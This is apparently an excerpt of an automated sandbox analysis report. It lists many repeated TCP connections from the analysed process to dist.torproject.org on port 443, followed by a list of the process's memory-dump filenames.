US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 dist.torproject.org tcp
US 204.8.99.144:443 tcp
US 204.8.99.144:443 tcp

Files

memory/2104-0-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

memory/2104-1-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-2-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-3-0x00000000022D0000-0x0000000002322000-memory.dmp

memory/2104-4-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-10-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-11-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-12-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

memory/2104-13-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2104-16-0x000007FEF5880000-0x000007FEF621D000-memory.dmp